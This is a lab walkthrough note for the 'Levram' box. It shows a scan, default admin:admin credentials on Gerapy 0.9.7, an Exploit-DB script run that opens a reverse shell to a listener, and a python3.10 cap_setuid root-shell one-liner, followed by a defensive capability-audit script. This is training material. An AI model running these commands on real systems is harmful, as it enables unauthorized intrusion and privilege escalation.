WDavid404 / PG-Box

PG box walkthrough note

Levram (easy) #25

Open WDavid404 opened 1 month ago

WDavid404 commented 1 month ago

Keypoints:

WDavid404 commented 1 month ago
```
PORT     STATE SERVICE  REASON         VERSION
22/tcp   open  ssh      syn-ack ttl 61 OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
8000/tcp open  http-alt syn-ack ttl 61 WSGIServer/0.2 CPython/3.10.6
|_http-cors: GET POST PUT DELETE OPTIONS PATCH
|_http-server-header: WSGIServer/0.2 CPython/3.10.6
| http-methods: 
|_  Supported Methods: OPTIONS GET
|_http-title: Gerapy
```

http://192.168.207.24:8000 --> Can log in with admin:admin --> Gerapy v0.9.7

Search Gerapy v0.9.7 exploit --> https://www.exploit-db.com/exploits/50640

To use this exploit script, a new project needs to be created first. Then run:

```
python3 50640.py -t 192.168.207.24 -p 8000 -L 192.168.45.180 -P 80
```

Got a reverse shell from the target host.

PE:

linpeas: /usr/bin/python3.10 cap_setuid=ep

According to GTFOBins:

```
/usr/bin/python3.10 -c 'import os; os.setuid(0); os.system("/bin/sh")'
```
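For the hardening side of this finding, the sketch below audits `getcap -r /` output for the same misconfiguration: a risky file capability, in particular on an interpreter. It is an added example, not part of the original note; the capability list, interpreter pattern, severity labels and sample output are constructed assumptions.

```python
import re

# Capabilities that allow changing identity or bypassing file permission checks.
RISKY_CAPS = {"cap_setuid", "cap_setgid", "cap_dac_override",
              "cap_dac_read_search", "cap_sys_admin", "cap_sys_ptrace",
              "cap_sys_module", "cap_chown", "cap_fowner"}
# Programs that run caller-supplied code, so any capability they hold is the caller's.
INTERPRETER = re.compile(r"/(python|perl|ruby|php|node|lua|gdb|vim?|bash|sh)[\d.]*$")
# Accepts both "path caps=ep" (newer libcap) and "path = caps+ep" (older libcap).
LINE = re.compile(r"^(?P<path>.+?)(?: =)? (?P<caps>[a-z0-9_,]*)[=+](?P<flags>[eip]+)$")

def audit_getcap(output):
    """Return [(severity, path, [risky caps])] for `getcap -r /` output."""
    findings = []
    for raw in output.splitlines():
        m = LINE.match(raw.strip())
        if not m or "p" not in m["flags"]:
            continue  # unparsable line, or capability not in the permitted set
        caps = set(filter(None, m["caps"].split(",")))
        # An empty capability list ("=ep") grants every capability.
        risky = sorted(RISKY_CAPS if not caps else caps & RISKY_CAPS)
        if not risky:
            continue
        severity = "critical" if INTERPRETER.search(m["path"]) else "review"
        findings.append((severity, m["path"], risky))
    return sorted(findings)

# Constructed sample output; only the python3.10 line mirrors the finding above.
SAMPLE = """\
/usr/bin/python3.10 cap_setuid=ep
/usr/bin/ping cap_net_raw=ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
/opt/backup/agent cap_dac_read_search=ep
"""

if __name__ == "__main__":
    for severity, path, caps in audit_getcap(SAMPLE):
        print(f"{severity:8} {path}  {','.join(caps)}")
        if severity == "critical":
            # setcap -r strips all file capabilities from the binary.
            print(f"         fix: setcap -r {path}")
```
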